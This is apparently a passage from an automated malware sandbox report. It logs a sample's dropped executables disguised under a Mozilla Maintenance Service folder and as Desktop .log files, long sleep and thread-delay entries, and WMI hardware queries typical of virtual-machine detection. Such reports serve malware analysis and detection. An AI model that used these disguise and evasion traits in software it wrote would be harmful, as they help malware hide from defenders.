                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 595594Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 595406Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 595156Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 594875Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 594688Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 594516Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 594281Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 593953Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 593688Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 593375Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 593125Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 592891Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 592672Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 592422Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 592141Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 591906Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 591594Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 591375Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 591063Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 590688Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 590344Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 590000Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 589688Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 589375Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 589031Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 588688Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 588500Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 588391Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 588281Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 588172Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 588036Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 587906Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 587790Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 587687Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 587578Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 587469Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 587352Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 587232Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 587125Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 587003Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 586882Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 586766Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 586641Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 586531Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 586422Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 586297Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWindow / User API: threadDelayed 4540Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWindow / User API: threadDelayed 3981Jump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\rZIMgllI.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\WSdqVQmD.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\VWqPFTQA.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\mmqNDpWU.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\YQFyrQBy.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\aSrhMzGt.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\qtoWZHQP.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeDropped PE file which has not been started: C:\Users\user\Desktop\RFZqtRqa.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\VeZikCqF.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\HAEBtuve.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeDropped PE file which has not been started: C:\Users\user\Desktop\AyILZeLM.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeDropped PE file which has not been started: C:\Users\user\Desktop\sDsEbPBc.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeDropped PE file which has not been started: C:\Users\user\Desktop\DjncgsWF.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\NcaIHEGQ.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZzoyrgAK.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeDropped PE file which has not been started: C:\Users\user\Desktop\dqepydAD.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\CNmCQxgq.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeDropped PE file which has not been started: C:\Users\user\Desktop\MjOKfqVp.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeDropped PE file which has not been started: C:\Users\user\Desktop\hgVgFZAw.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeDropped PE file which has not been started: C:\Users\user\Desktop\EgPkCslz.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\EySSXLrj.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\fFJfpvVh.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeDropped PE file which has not been started: C:\Users\user\Desktop\PZEBmnVi.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeDropped PE file which has not been started: C:\Users\user\Desktop\tAUMwPQX.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeDropped PE file which has not been started: C:\Users\user\Desktop\rMQELCVZ.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeDropped PE file which has not been started: C:\Users\user\Desktop\kWLWNWBq.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\DKOKmxvl.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeDropped PE file which has not been started: C:\Users\user\Desktop\BvjTveaH.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe TID: 5344Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 4748Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -599890s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -599547s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 1080Thread sleep time: -2400000s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -598985s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -598485s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -597985s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -597810s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -597391s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -596844s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -596516s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -596031s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -595733s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -595594s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -595406s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -595156s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -594875s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -594688s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -594516s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -594281s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -593953s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -593688s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -593375s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -593125s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -592891s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -592672s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -592422s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -592141s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -591906s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -591594s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -591375s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -591063s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -590688s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -590344s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -590000s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -589688s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -589375s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -589031s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -588688s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -588500s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -588391s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -588281s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -588172s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -588036s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -587906s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -587790s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -587687s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -587578s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -587469s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -587352s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -587232s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -587125s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -587003s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -586882s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -586766s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -586641s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -586531s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -586422s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe TID: 6500Thread sleep time: -586297s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007CA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_007CA69B
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007DC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_007DC220
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007EB348 FindFirstFileExA,0_2_007EB348
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007DE6A3 VirtualQuery,GetSystemInfo,0_2_007DE6A3
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 599890Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 599547Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 300000Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 598985Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 598485Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 597985Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 597810Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 597391Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 596844Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 596516Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 596031Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 595733Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 595594Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 595406Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 595156Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 594875Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 594688Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeThread delayed: delay time: 594516Jump to behavior
